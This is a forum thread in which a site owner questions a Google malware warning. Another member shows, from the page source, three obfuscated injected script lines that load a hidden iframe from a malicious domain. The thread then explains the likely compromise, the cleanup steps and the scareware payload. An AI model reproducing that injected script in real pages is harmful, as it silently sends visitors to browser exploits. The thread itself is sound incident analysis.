no link like that
Printable View
no link like that
Sleger, Where did you get that malware updatedate.cn warning? Google? I just had my host do a scan again and found nothing. I scanned my computer and nothing. I looked at the two placeholders and there is no link to updatedate.cn in either. I think that is old what you have. I notice the date is the 7th. Last week I did have issues with the site. There were infections on the host server, but were cleaned. It should be safe now.
Mike the date indicated by the alert is the 7th month, unless you have a 15 month calendar ;)Quote:
I think that is old what you have.
2009-07-15 = July 15th 2009.
You have to take it up with Google - they do the scan and likely have better tools than your host, but it may be a false positive.
If you have Google Chrome installed, you can see for yourself.
Thanks for your help sleger.
Google is quite right (as it almost always is in these cases). You are hacked to pieces. 'View Source' on your page, just after the body tag:
(Angle brackets replaced with braces to try to avoid triggering paranoid AV tools.) This shows you've been hacked three times by the same automated attack (clearly it hasn't noticed that it already owned your site).Code:{{script}}document.write("{{"+"i"+"f"+"rame src=http:"+"//upda"+"t"+"edat"+"e."+"c"+"n/"+" height=1 width"+"=1"+"}}"+"{{/if"+"ram"+"e}}");{{/script}}
{{script}}document.write("{{i"+ "f"+"rame "+"s" +"rc=ht"+ "t"+"p:"+ "//"+"u"+"p" +"da"+"tedat"+ "e.cn/ "+ "hei" +"g"+"ht" +"="+"1" +" " +"width=1}}"+ "{{" +"/" +"if"+"rame}}");{{/script}}
{{script}}document.write("{{if"+"rame "+"s" +"r"+"c=http:/"+"/u" +"pd"+"ateda" +"te"+".cn"+"/ " +"hei"+"g"+"h"+"t=1" +" "+"wi"+"dth="+"1"+"}}{{"+"/ifram"+"e" +"}}");{{/script}}
These attacks are at the moment concentrating on two methods: gaining access to the web server through insecure web applications (typically PHP) installed on it, and stealing passwords from compromised end-user machines.
As well as asking your host to check the server for compromise, and changing your account password, you need to check your end. Since I don't see infections on other sites on the same server, it is likely that your own computer is infected. You could have got it from viewing another web site that has the same infection as yours; then, when you uploaded pages to your site, the malware sniffed your password and leaked it to the attackers. Check your machine with multiple online AVs, but don't trust them to find and remove everything because AV today is not reliable - instead, consider re-installing Windows, changing all your passwords, using SFTP instead of FTP to upload files to the server, and don't install plugins you don't absolutely need.
All: do NOT visit chowardcompany or updatedate, or you'll be hit with a variety of browser exploits including attacks against Adobe Reader and Flash. Do not rely on your anti-virus to catch web exploits, AV simply cannot keep up at the moment.
Thanks for that, Bob.
For those of us who have already visited the infected site, 1) is there some way to know if we have become infected, and if so 2) how might we restore a healthy computer state?
OK, I tried the payload on a virtual machine. For me at the moment it installs a system tray "You have spyware!" scareware promotion for a rogue AV called 'PC Security 2009' and a driver that attempts to kill any actual AV software loaded. It also restarted the machine, so if you got infected by that you'd probably notice.
(However, the payloads used by web exploits can and do change...)
Well, I must appologise to you all. Had I known that there was an issue, I would not of posted any requests to visit my site. My host said it was safe with no problems. My computer comes up clean also. I have deleted the site and I am now in the process of reinstalling my computer os. Again, I hope you accept my appologies. I do like this forum and almost depend on it at times. I would never intentionally put the participants at risk.
Thanks for your time,
Mike